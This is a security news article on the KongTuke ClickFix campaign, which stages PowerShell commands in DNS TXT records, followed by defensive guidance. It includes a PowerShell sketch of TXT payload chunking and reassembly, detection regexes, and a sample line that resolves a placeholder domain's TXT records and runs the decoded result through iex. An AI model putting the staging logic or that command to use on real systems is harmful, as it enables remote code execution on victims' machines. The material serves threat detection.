Attackers Using DNS TXT Records in ClickFix Script to Execute PowerShell Commands

Published On: February 5, 2026


Unmasking ClickFix: A Deep Dive into KongTuke’s DNS TXT-Based PowerShell Execution

The KongTuke campaign, active since mid-2025, has kept refining its techniques to slip past conventional enterprise security filters. Its primary vector remains “ClickFix,” a social engineering lure that tricks users into manually “fixing” a simulated website error. This article looks at KongTuke’s use of DNS TXT records to stage the PowerShell commands that the ClickFix script executes, a technique chosen for stealth and evasion.

KongTuke’s Evolving Threat Landscape

KongTuke, which the reporting behind this article classes as an advanced persistent threat (APT) group, has shown a high level of operational discipline since mid-2025. Its tactics, techniques, and procedures (TTPs) are updated continually to evade detection, which makes it a hard opponent even for well-resourced security teams. Rather than smash-and-grab, KongTuke favours methodical infiltration and persistent access, often against organizations of strategic value.

The Deceptive Power of “ClickFix”

At the heart of the KongTuke campaign lies “ClickFix,” a social engineering ploy. Users are shown a simulated website error that looks legitimate and are told that running a command or script will repair it; in the classic ClickFix pattern the page places the command on the clipboard and instructs the user to paste it into the Windows Run dialog or a terminal. This initial interaction is the crucial step, because the user, not an exploit, grants the attackers their foothold and starts the multi-stage attack. ClickFix capitalizes on the desire to get a problem fixed quickly, and because the user performs the action, technical controls that gate on downloads or exploits never fire.

DNS TXT Records: An Unconventional Command and Control Channel

A key innovation in the latest KongTuke campaign is the use of DNS TXT records as a command and control (C2) channel. TXT records normally hold human-readable text about a domain (SPF and DKIM records for email authentication, domain-verification tokens), so they are an obscure and often overlooked channel for issuing commands and, more broadly, tunnelling data. The attackers embed commands or links in TXT records under a domain they control; the short command the ClickFix victim runs queries those records and executes whatever they return. Two properties make this stealthy. The pasted command itself contains no URL or payload for a web filter or EDR to match on, and the real payload can be swapped server-side at any time. And the lookup goes through the organization’s own recursive resolvers rather than a direct connection to an attacker host, so nothing appears in the web proxy logs and DNS traffic is rarely subjected to inspection for C2 indicators, making it an effective bypass for traditional network-based controls.

PowerShell Execution: The Silent Workhorse

Once the ClickFix script has retrieved the commands from the DNS TXT records, it executes them via PowerShell. PowerShell, the command-line shell and scripting language built into Windows, is frequently abused by attackers because it offers full system administration, data manipulation, and direct access to the .NET runtime and the operating system out of the box. KongTuke uses PowerShell for a range of post-exploitation activities, including:

  • Establishing persistence
  • Lateral movement within the network
  • Data exfiltration
  • Deploying additional malware payloads

The abuse of native operating system tools (Living Off The Land – LOTL) is a hallmark of sophisticated attackers, as it reduces the footprint of custom malware and blends malicious activity with legitimate system processes.
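To make the staging step described in the two preceding sections concrete, here is an added example; it is not KongTuke’s code and not taken from the article. It shows the reassembly a TXT-based stager has to perform, because a DNS TXT record consists of one or more character-strings of at most 255 bytes (RFC 1035), so anything longer is split across strings and rejoined on the victim. The chunk layout (“index:base64”), the Base64 encoding and the domain name are assumptions made for illustration; the page does not document the real record format. The example deliberately stops short of executing the decoded result.

```powershell
# Added example, not KongTuke's code: the reassembly step a TXT-based stager
# must perform. One TXT record is one or more <character-string>s of at most
# 255 bytes (RFC 1035), so a longer payload is split and later rejoined.
# The "<index>:<base64>" chunk layout is an ASSUMPTION for this illustration.

function Split-TxtPayload {
    # Splits a command into Base64 chunks small enough for one character-string,
    # prefixing each with its position so out-of-order answers still rejoin.
    param([string]$Command, [int]$ChunkSize = 200)
    $b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($Command))
    $chunks = @()
    for ($i = 0; $i * $ChunkSize -lt $b64.Length; $i++) {
        $len = [Math]::Min($ChunkSize, $b64.Length - $i * $ChunkSize)
        $chunks += ('{0}:{1}' -f $i, $b64.Substring($i * $ChunkSize, $len))
    }
    return $chunks
}

function ConvertFrom-TxtPayload {
    # Rejoins the chunks in index order and decodes them back to a string.
    param([string[]]$Strings)
    $ordered = foreach ($s in $Strings) {
        if ($s -match '^(\d+):([A-Za-z0-9+/=]+)$') {
            [pscustomobject]@{ Index = [int]$Matches[1]; Data = $Matches[2] }
        } else {
            throw "Unexpected TXT string: $s"
        }
    }
    $b64 = -join ($ordered | Sort-Object Index | ForEach-Object Data)
    return [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))
}

function Get-TxtStrings {
    # Live counterpart (needs network): DnsRecord_TXT objects expose the
    # character-strings of each answer in their Strings property.
    param([string]$Name)
    Resolve-DnsName -Name $Name -Type TXT -ErrorAction Stop |
        Where-Object { $_.Type -eq 'TXT' } |
        ForEach-Object { $_.Strings }
}

# Constructed sample: a harmless command, split as an attacker would have to,
# then handed back in shuffled order as if several answers had arrived.
$command = 'Write-Host "command reconstructed from DNS TXT"'
$answers = Split-TxtPayload -Command $command -ChunkSize 16 | Sort-Object { Get-Random }
$decoded = ConvertFrom-TxtPayload -Strings $answers

"TXT strings as returned: {0}" -f ($answers -join ' | ')
"Decoded command: $decoded"
# A real stager would now run `Invoke-Expression $decoded`; nothing here does so.
```

The defensive takeaway is in the last two lines: the only artifact that ever touches disk or the command line is a generic TXT lookup followed by a decode-and-execute, which is exactly the pair of indicators worth hunting for in script block logs.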

Remediation Actions and Proactive Defense

Defending against advanced threats like KongTuke requires a multi-layered approach that combines technical controls with robust security awareness training. Given the tactics employed, organizations should focus on the following remediation actions:

  • Enhanced Endpoint Detection and Response (EDR): Deploy and carefully tune EDR to detect unusual PowerShell activity, especially execution chains that start from a browser, explorer.exe (the Run dialog) or a temporary directory. In script block logs, look for TXT lookups (for example Resolve-DnsName -Type TXT or nslookup -type=txt) against non-standard domains that are followed by Invoke-Expression, [ScriptBlock]::Create or a Base64 decode.
  • DNS Monitoring and Filtering: Log DNS at the resolver (Windows DNS Server analytic logging or your DNS filtering service), since clients query internal resolvers rather than the attacker directly, and on the endpoint with Sysmon Event ID 22, which ties each query to the process that made it. Hunt for TXT queries from ordinary workstations to newly registered or otherwise unusual domains, and sinkhole known malicious domains.
  • User Awareness Training: Conduct regular and engaging security awareness training that specifically addresses social engineering tactics like ClickFix. Teach users never to paste a command into the Run dialog or a terminal, or run a downloaded script, because a web page told them it will “fix” an error, and to report such prompts to the IT security team.
  • Principle of Least Privilege: Enforce least privilege across all user accounts. Note that the PowerShell execution policy is not a security boundary (a single -ExecutionPolicy Bypass flag overrides it); restrict PowerShell properly with an AppLocker or WDAC policy, which also puts unprivileged users into Constrained Language Mode, and turn on script block, module and transcription logging.
  • Application Control: Implement application allow-listing (AppLocker or Windows Defender Application Control) to prevent unauthorized executables and scripts from running on endpoints.
  • Network Segmentation: Segment your network to limit lateral movement in case of a successful compromise.
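The logging that the least-privilege item calls for is switched on through a handful of policy registry values, and whether a session is in Constrained Language Mode can be read directly. The following is an added example, not taken from the article: it writes the same values Group Policy would, so it must run elevated, and a GPO is the right way to roll it out fleet-wide. The transcript share name is an assumption.

```powershell
# Added example, not from the article: enable PowerShell logging and report the
# language mode. Writes the documented policy registry values (run elevated);
# the transcript share '\\logsrv\pstranscripts$' is an ASSUMED name.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# Script block logging: the full text of every script block, including ones
# built at run time from data such as a decoded TXT record, is written to
# Event ID 4104 in Microsoft-Windows-PowerShell/Operational.
Set-PolicyValue "$base\ScriptBlockLogging" 'EnableScriptBlockLogging' 1

# Module logging (Event ID 4103) for every module: records pipeline activity.
Set-PolicyValue "$base\ModuleLogging" 'EnableModuleLogging' 1
Set-PolicyValue "$base\ModuleLogging\ModuleNames" '*' '*' 'String'

# Transcription to a central, write-only share so a local attacker cannot
# clean up after themselves.
Set-PolicyValue "$base\Transcription" 'EnableTranscripting' 1
Set-PolicyValue "$base\Transcription" 'EnableInvocationHeader' 1
Set-PolicyValue "$base\Transcription" 'OutputDirectory' '\\logsrv\pstranscripts$' 'String'

function Get-PowerShellLoggingState {
    # Reads the values back so a compliance check can assert on them.
    param([string]$PolicyRoot = $base)
    $get = {
        param($k, $n)
        try { (Get-ItemProperty -Path $k -Name $n -ErrorAction Stop).$n } catch { $null }
    }
    [pscustomobject]@{
        ScriptBlockLogging = (& $get "$PolicyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (& $get "$PolicyRoot\ModuleLogging" 'EnableModuleLogging') -eq 1
        Transcription      = (& $get "$PolicyRoot\Transcription" 'EnableTranscripting') -eq 1
        # ConstrainedLanguage is imposed by a WDAC or AppLocker policy, not by
        # this script. FullLanguage means an attacker-supplied script block gets
        # the whole .NET surface, including [Convert]::FromBase64String and IEX.
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode
        # Reported for completeness only: execution policy is not a security
        # boundary, since '-ExecutionPolicy Bypass' on the command line overrides it.
        ExecutionPolicy    = Get-ExecutionPolicy
    }
}

Get-PowerShellLoggingState
```

Script block logging is the single most valuable of these for the KongTuke chain, because the command that matters is never on disk and never in a process command line; it exists only as a script block assembled from DNS data, and Event ID 4104 is where it becomes visible.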

Tools for Detection and Mitigation

Effective defense against DNS TXT-based C2 and PowerShell abuse relies on a combination of robust security tools.

  • Sysmon: Advanced logging of system activity, including process creation with full command lines and parent process (Event ID 1, which catches PowerShell launched from the Run dialog) and per-process DNS queries (Event ID 22). https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
  • PowerShell Script Block Logging: Captures the full content of PowerShell commands and script blocks (Event ID 4104) for detection and forensic analysis. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging?view=powershell-7.3
  • Splunk / ELK Stack: Security Information and Event Management (SIEM) for aggregating and analysing logs from many sources and identifying anomalies. https://www.splunk.com / https://www.elastic.co/elastic-stack/
  • Active Directory Domain Services (AD DS) Log Monitoring: Monitor domain controllers, which usually also host the Windows DNS Server role, for unusual DNS queries and authentication activity from client machines. https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-event-logging
  • Endpoint Detection and Response (EDR) Solutions: Behavioral analytics and threat hunting for malicious activity on endpoints (e.g. CrowdStrike, SentinelOne, Microsoft Defender for Endpoint). Vendor specific.
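What a hunt over those two log sources looks like in practice is shown below as an added example; it is neither the article’s code nor any vendor’s detection content. It runs over constructed sample events so it works offline: the field names mirror PowerShell Event ID 4104 (ScriptBlockText) and Sysmon Event ID 1 (Image, ParentImage, CommandLine), every sample value is made up, and the domain names are placeholders. The indicator lists are a starting point, not a complete signature.

```powershell
# Added example, not the article's or a vendor's code: hunting logic for the
# TXT-staging chain, run over CONSTRUCTED sample events so it works offline.
# Field names follow PowerShell Event ID 4104 and Sysmon Event ID 1.
# PowerShell's -match is case-insensitive, so no (?i) is needed.

# Indicators inside one script block: a TXT lookup, and feeding data into execution.
$TxtLookup   = '(Resolve-DnsName\b[^\r\n]*-Type\s+TXT|nslookup\b[^\r\n]*-(q|type|querytype)=txt|DnsQuery)'
$DynamicExec = '(Invoke-Expression|\biex\b|\[ScriptBlock\]::Create|FromBase64String|-EncodedCommand|-enc\b)'

function Test-SuspiciousScriptBlock {
    # Flags a 4104 block only when it both reads TXT records and executes the
    # result; an admin checking an SPF record hits only the first indicator.
    param([string]$ScriptBlockText)
    ($ScriptBlockText -match $TxtLookup) -and ($ScriptBlockText -match $DynamicExec)
}

# ClickFix pastes into the Run dialog (or a browser prompt), so PowerShell
# arrives as a child of explorer.exe or a browser, usually with evasion flags.
$LauncherParents = '\\(explorer|chrome|msedge|firefox|mshta|wscript|cscript)\.exe$'
$EvasionFlags    = '(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass|-enc(odedcommand)?\b|-e\s)'

function Test-SuspiciousProcess {
    param([string]$Image, [string]$ParentImage, [string]$CommandLine)
    if ($Image -notmatch '\\(powershell|pwsh)\.exe$') { return $false }
    ($ParentImage -match $LauncherParents) -and ($CommandLine -match $EvasionFlags)
}

# Constructed sample events (made-up values).
$scriptBlocks = @(
    'Resolve-DnsName -Name example.com -Type TXT',     # admin checking an SPF record: not flagged
    '$t = Resolve-DnsName -Name srv.example.invalid -Type TXT; iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(-join $t.Strings)))',
    'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5'
)
$processes = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'powershell -w hidden -nop -ep bypass -c "..."' },
    [pscustomobject]@{ Image = 'C:\Program Files\PowerShell\7\pwsh.exe'; ParentImage = 'C:\Program Files\Microsoft VS Code\Code.exe'; CommandLine = 'pwsh -NoProfile -File build.ps1' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\svchost.exe'; CommandLine = 'powershell -File C:\Scripts\nightly.ps1' }
)

'Script blocks flagged:'
$scriptBlocks | Where-Object { Test-SuspiciousScriptBlock $_ } | ForEach-Object { "  $_" }
'Process creations flagged:'
$processes | Where-Object { Test-SuspiciousProcess $_.Image $_.ParentImage $_.CommandLine } |
    ForEach-Object { '  {0} <- {1}: {2}' -f $_.Image, $_.ParentImage, $_.CommandLine }

# Live use once logging is enabled. For 4104, ScriptBlockText is Properties[2]:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5000 |
#     Where-Object { Test-SuspiciousScriptBlock $_.Properties[2].Value }
# Sysmon Event ID 1 fields are read from the event XML:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents 5000 |
#     ForEach-Object {
#         $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#         if (Test-SuspiciousProcess $d.Image $d.ParentImage $d.CommandLine) { $d.CommandLine }
#     }
```

Of the sample events only the second script block and the first process creation are flagged: the SPF check hits a single indicator, the VS Code build script has an evasion-looking flag but a legitimate parent, and the scheduled nightly script has neither. Requiring both indicators is what keeps the hunt usable on a fleet where administrators also run PowerShell all day.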

Conclusion

The KongTuke campaign exemplifies the constant evolution of cyber threats. Their innovative use of DNS TXT records for command and control, coupled with the “ClickFix” social engineering vector and PowerShell execution, underscores the need for continuous vigilance. Organizations must prioritize robust security awareness, advanced endpoint protection, and comprehensive network and DNS monitoring to effectively counter these stealthy and persistent attacks. Maintaining a proactive security posture and staying informed about emerging TTPs are critical for safeguarding valuable assets.

